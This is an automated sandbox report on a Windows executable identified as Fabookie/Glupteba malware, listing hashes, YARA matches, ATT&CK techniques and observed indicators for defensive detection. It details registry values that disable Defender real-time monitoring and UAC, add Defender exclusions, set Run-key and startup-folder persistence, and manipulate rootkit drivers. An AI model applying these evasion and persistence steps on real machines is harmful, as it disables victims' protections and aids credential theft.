fabookie | bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248

Analysis

max time kernel
280s
max time network
300s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
04-02-2024 03:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe
Size

1.4MB
MD5

eba840631908d1b6510df1ad7e64d5ce
SHA1

47f8ba9971bd484a48e4960f0fc7bd9f3643232a
SHA256

bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248
SHA512

a4e711746b78a233ebf91fa7735695f1b17acf4b4296248aea0b39c78a51837d0c3617b0fbf89a6a9466c10fed4412fa34109b6957bcfca3d64cc5a4374555a2
SSDEEP

24576:k0aJxn2Juo1nylyUK3TkosLHCzKyewLms4xuyEuUV21ACcmFkzeyl6KtkGuTWn6f:VWxn2Ju8EK3TkosLGZewLmsYErU6Z/la

Score

10^/10

fabookie glupteba discovery dropper evasion loader persistence ransomware rootkit spyware stealer trojan upx

Malware Config

Signatures

Detect Fabookie payload 1 IoCs

resource	yara_rule
behavioral1/memory/2848-631-0x00000000035B0000-0x00000000036DC000-memory.dmp	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 10 IoCs

resource	yara_rule
behavioral1/memory/2732-370-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2732-369-0x0000000002B40000-0x000000000342B000-memory.dmp	family_glupteba
behavioral1/memory/1280-387-0x0000000002A70000-0x000000000335B000-memory.dmp	family_glupteba
behavioral1/memory/1280-392-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1280-388-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2008-719-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2008-725-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2008-1005-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2008-1007-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2008-1009-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe

Windows security bypass 2 TTPs 50 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe = "0"	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\uqeRQcQeSVSWnHVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	wmiprvse.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FohpjzYDshfCC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IoHaAJhEDYhU2 = "0"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	DllHost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR = "0"	DllHost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Ga1aWp1y35A2jCNYRRdwYaiw.exe = "0"	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KCGdmeQdU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\uqeRQcQeSVSWnHVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hgFvgKbJayUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FohpjzYDshfCC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KCGdmeQdU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\YzkPQgDELwrGtM0OTFyfOecE.exe = "0"	YzkPQgDELwrGtM0OTFyfOecE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IoHaAJhEDYhU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0"	wmiprvse.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hgFvgKbJayUn = "0"	reg.exe

Modifies boot configuration data using bcdedit 1 TTPs 14 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2140	bcdedit.exe
1280	bcdedit.exe
2684	bcdedit.exe
2148	bcdedit.exe
2688	bcdedit.exe
2868	bcdedit.exe
2536	bcdedit.exe
1076	bcdedit.exe
704	bcdedit.exe
2600	bcdedit.exe
1752	bcdedit.exe
1856	bcdedit.exe
1756	bcdedit.exe
2056	bcdedit.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
75	2888	rundll32.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
592	netsh.exe
584	netsh.exe

Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\International\Geo\Nation	mKZWjXr.exe

Drops startup file 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XkaiOoHBLIWDAXfPKRMgpiVl.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3PPKfrbq8KdlkEGhXD2GFb8h.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tVsdeJRD7joNcgCVQJ5lHB5Q.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LxK8s2yr17aKRqxjsCtCSole.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZqqfBv9bNL2T1lSdyDgaaEzB.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7QB0HcYPUD7D7sfWuQjwcSZD.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CLfKynop1FtYLHgniUBlRgwT.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dwRMsQE4WfmuDqc9WLrha1L4.bat	CasPol.exe

Executes dropped EXE 25 IoCs

pid	Process
2732	Ga1aWp1y35A2jCNYRRdwYaiw.exe
1280	reg.exe
2956	Ga1aWp1y35A2jCNYRRdwYaiw.exe
2760	YzkPQgDELwrGtM0OTFyfOecE.exe
2848	conhost.exe
2008	csrss.exe
1112	patch.exe
2544	PSoXfVjiH22H5YX7QfDoJiUe.exe
2616	injector.exe
2512	8NEVmM8hj8lMUTThXm7yQ4Pe.exe
2636	Install.exe
2688	conhost.exe
1184	hLnT2nBwKptJfO7HbITCc0Up.exe
2120	Install.exe
2124	69dkxh291SILb89gnNbihBC1.exe
3052	uUVSWZe.exe
1852	dsefix.exe
2944	windefender.exe
1484	windefender.exe
576	mKZWjXr.exe
2260	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
2248	713674d5e968cbe2102394be0b2bae6f.exe
1364	1bf850b4d9587c1017a75a47680584c4.exe
636	wup.exe
576	csrss.exe

Loads dropped DLL 49 IoCs

pid	Process
2532	CasPol.exe
2532	CasPol.exe
2532	CasPol.exe
2532	CasPol.exe
2532	CasPol.exe
2956	Ga1aWp1y35A2jCNYRRdwYaiw.exe
2956	Ga1aWp1y35A2jCNYRRdwYaiw.exe
852	Process not Found
1112	patch.exe
1112	patch.exe
1112	patch.exe
1112	patch.exe
1112	patch.exe
2532	CasPol.exe
2544	PSoXfVjiH22H5YX7QfDoJiUe.exe
2544	PSoXfVjiH22H5YX7QfDoJiUe.exe
2544	PSoXfVjiH22H5YX7QfDoJiUe.exe
2008	csrss.exe
2532	CasPol.exe
2544	PSoXfVjiH22H5YX7QfDoJiUe.exe
2636	Install.exe
2636	Install.exe
2636	Install.exe
2512	8NEVmM8hj8lMUTThXm7yQ4Pe.exe
2532	CasPol.exe
2532	CasPol.exe
2636	Install.exe
2120	Install.exe
2120	Install.exe
2120	Install.exe
2532	CasPol.exe
2124	69dkxh291SILb89gnNbihBC1.exe
2124	69dkxh291SILb89gnNbihBC1.exe
1112	patch.exe
1112	patch.exe
1112	patch.exe
2008	csrss.exe
2888	rundll32.exe
2888	rundll32.exe
2888	rundll32.exe
2888	rundll32.exe
2008	csrss.exe
2008	csrss.exe
2008	csrss.exe
2008	csrss.exe
2008	csrss.exe
2008	csrss.exe
2260	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
2260	dcb505dc2b9d8aac05f4ca0727f5eadb.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000018ed8-574.dat	upx
behavioral1/memory/2124-579-0x00000000008E0000-0x0000000000DC8000-memory.dmp	upx
behavioral1/files/0x0007000000018ed8-573.dat	upx
behavioral1/files/0x0007000000018ed8-571.dat	upx
behavioral1/memory/2124-635-0x00000000008E0000-0x0000000000DC8000-memory.dmp	upx
behavioral1/memory/2944-723-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/1484-772-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/1484-1006-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/files/0x00080000000120ac-1040.dat	upx
behavioral1/files/0x0007000000016cb6-1048.dat	upx
behavioral1/files/0x000800000001737c-1056.dat	upx

Windows security modification 2 TTPs 15 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe = "0"	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\YzkPQgDELwrGtM0OTFyfOecE.exe = "0"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IoHaAJhEDYhU2 = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Ga1aWp1y35A2jCNYRRdwYaiw.exe = "0"	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt = "0"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast	Install.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	mKZWjXr.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	mKZWjXr.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	pastebin.com
6	pastebin.com

Manipulates WinMon driver. 2 IoCs

Roottkits write to WinMon to hide PIDs from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMon	csrss.exe
File opened for modification	\??\WinMon	csrss.exe

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	bcdedit.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	uUVSWZe.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	uUVSWZe.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	uUVSWZe.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	mKZWjXr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_8CFD0F060456F65ABC9E95E41A1F781C	mKZWjXr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_D50E9269859FFB5A738F673D82E63752	mKZWjXr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	mKZWjXr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	mKZWjXr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_5715DE550AA680C2FBA40D3A4F6608E9	mKZWjXr.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	mKZWjXr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	mKZWjXr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_8CFD0F060456F65ABC9E95E41A1F781C	mKZWjXr.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	mKZWjXr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_D50E9269859FFB5A738F673D82E63752	mKZWjXr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_5715DE550AA680C2FBA40D3A4F6608E9	mKZWjXr.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2200 set thread context of 2532	2200	bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe	30

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	Ga1aWp1y35A2jCNYRRdwYaiw.exe
File opened (read-only)	\??\VBoxMiniRdrDN	YzkPQgDELwrGtM0OTFyfOecE.exe

Drops file in Program Files directory 13 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\FohpjzYDshfCC\yqyYkJN.xml	mKZWjXr.exe
File created	C:\Program Files (x86)\FohpjzYDshfCC\rutHmNW.dll	mKZWjXr.exe
File created	C:\Program Files (x86)\IoHaAJhEDYhU2\fyJbwExvlSjxn.dll	mKZWjXr.exe
File created	C:\Program Files (x86)\IoHaAJhEDYhU2\JmhoWry.xml	mKZWjXr.exe
File created	C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\emZkybo.xml	mKZWjXr.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	mKZWjXr.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	mKZWjXr.exe
File created	C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\JPKevwA.dll	mKZWjXr.exe
File created	C:\Program Files (x86)\hgFvgKbJayUn\DZCqPzb.dll	mKZWjXr.exe
File created	C:\Program Files (x86)\KCGdmeQdU\ybEvSx.dll	mKZWjXr.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	mKZWjXr.exe
File created	C:\Program Files (x86)\KCGdmeQdU\jXxZReY.xml	mKZWjXr.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	mKZWjXr.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
